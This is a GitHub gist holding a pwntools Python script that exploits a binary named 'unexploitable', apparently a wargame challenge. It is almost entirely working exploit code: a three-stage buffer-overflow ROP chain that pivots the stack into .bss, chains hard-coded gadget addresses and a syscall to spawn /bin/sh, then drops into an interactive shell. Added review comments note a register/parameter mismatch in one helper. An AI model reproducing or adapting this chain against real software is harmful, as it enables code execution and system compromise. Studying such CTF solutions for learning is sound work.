@vesim987
Last active March 12, 2018 15:04
from pwn import *
def syscall():
    """Return the 8-byte little-endian packing of address 0x400560.

    The author labels this gadget "syscall"; the instruction actually at
    that address is not shown anywhere on this page.
    """
    gadget = 0x400560
    return p64(gadget)
def set_rbx_rbp_r12_r13_r14_r15(rbx, rbp, r12, r13, r15):
    """Return the gadget address 0x4005e6 followed by seven packed qwords.

    Slot order after the address is: 0, rbx, rbp, r12, r13, r15, 0.

    NOTE(review): the function name lists r14 but the signature has no r14
    parameter, and the ``r15`` argument occupies the sixth slot with a
    constant 0 in the seventh. Which register each slot really reaches
    depends on the gadget at 0x4005e6, whose disassembly is not on this
    page — confirm before relying on the parameter name.
    """
    slots = [0x00000000004005e6, 0, rbx, rbp, r12, r13, r15, 0]
    return ''.join(map(p64, slots))
def mov_rdx_r15_mov_rsi_r14_mov_edi_r13d_call_r12_plus_rbx_m8():
    """Return the 8-byte little-endian packing of address 0x4005d0.

    The function name records the effect the author expects from this
    gadget; the disassembly itself is not shown on this page.
    """
    gadget = 0x4005d0
    return p64(gadget)
def read():
    """Return the 8-byte little-endian packing of address 0x40055b.

    Labelled "read" by the author; the code at that address is not shown
    on this page.
    """
    gadget = 0x40055b
    return p64(gadget)
def ret():
    """Return the 8-byte little-endian packing of address 0x400577.

    Labelled "ret" by the author; the instruction at that address is not
    shown on this page.
    """
    gadget = 0x400577
    return p64(gadget)
bss_section = 0x0000000000601028 + 0x10

# NOTE(review): the binary path, the gadget addresses and the bss offset used
# below are specific to the author's copy of the target; nothing on this page
# shows where they were derived from.
p = process("/home/unexploitable/unexploitable")

# The script never reads the process's output; every stage is paced purely by
# fixed sleeps, so timing on a slower machine may differ from the author's.
sleep(3)

stage1 = (
    "A"*16 +
    p64(bss_section) +
    read() +
    p64(0)
)
p.send(stage1)
sleep(1)

#new stack here
stage2 = (
    "A"*16 +
    p64(bss_section) +
    read() +
    set_rbx_rbp_r12_r13_r14_r15(0, 0, 0x601088, 0x601098, 0) +
    mov_rdx_r15_mov_rsi_r14_mov_edi_r13d_call_r12_plus_rbx_m8() +
    syscall() +
    "/bin/sh\0"  #0x601098
)
p.send(stage2)
sleep(1)

stage3 = (
    "A"*16 +
    p64(bss_section+8) +  #skip read()
    ret() +
    p64(0x00000000004005e6) +  #from set_rbx_rbp_r12_r13_r14_r15
    p64(0xBBBBBBBBBBBBBBBB) +
    p64(0) +
    p8(0) + p8(0) + p8(0)
)
p.send(stage3)

p.interactive()